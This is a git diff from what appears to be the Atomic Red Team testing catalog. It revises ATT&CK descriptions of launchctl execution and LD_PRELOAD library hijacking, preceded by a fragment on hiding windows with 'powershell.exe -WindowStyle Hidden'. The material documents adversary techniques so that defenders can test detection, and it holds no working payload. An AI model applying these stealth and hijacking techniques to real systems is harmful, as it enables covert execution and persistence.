+On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md
index 5b6b0c02..a71d8d12 100644
--- a/atomics/T1569.001/T1569.001.md
+++ b/atomics/T1569.001/T1569.001.md
@@ -4,7 +4,7 @@
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
-Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
+Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.
## Atomic Tests
diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md
index 8aef870e..4061d648 100644
--- a/atomics/T1574.006/T1574.006.md
+++ b/atomics/T1574.006/T1574.006.md
@@ -1,8 +1,10 @@
# T1574.006 - LD_PRELOAD
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.006)
-Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
-LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
## Atomic Tests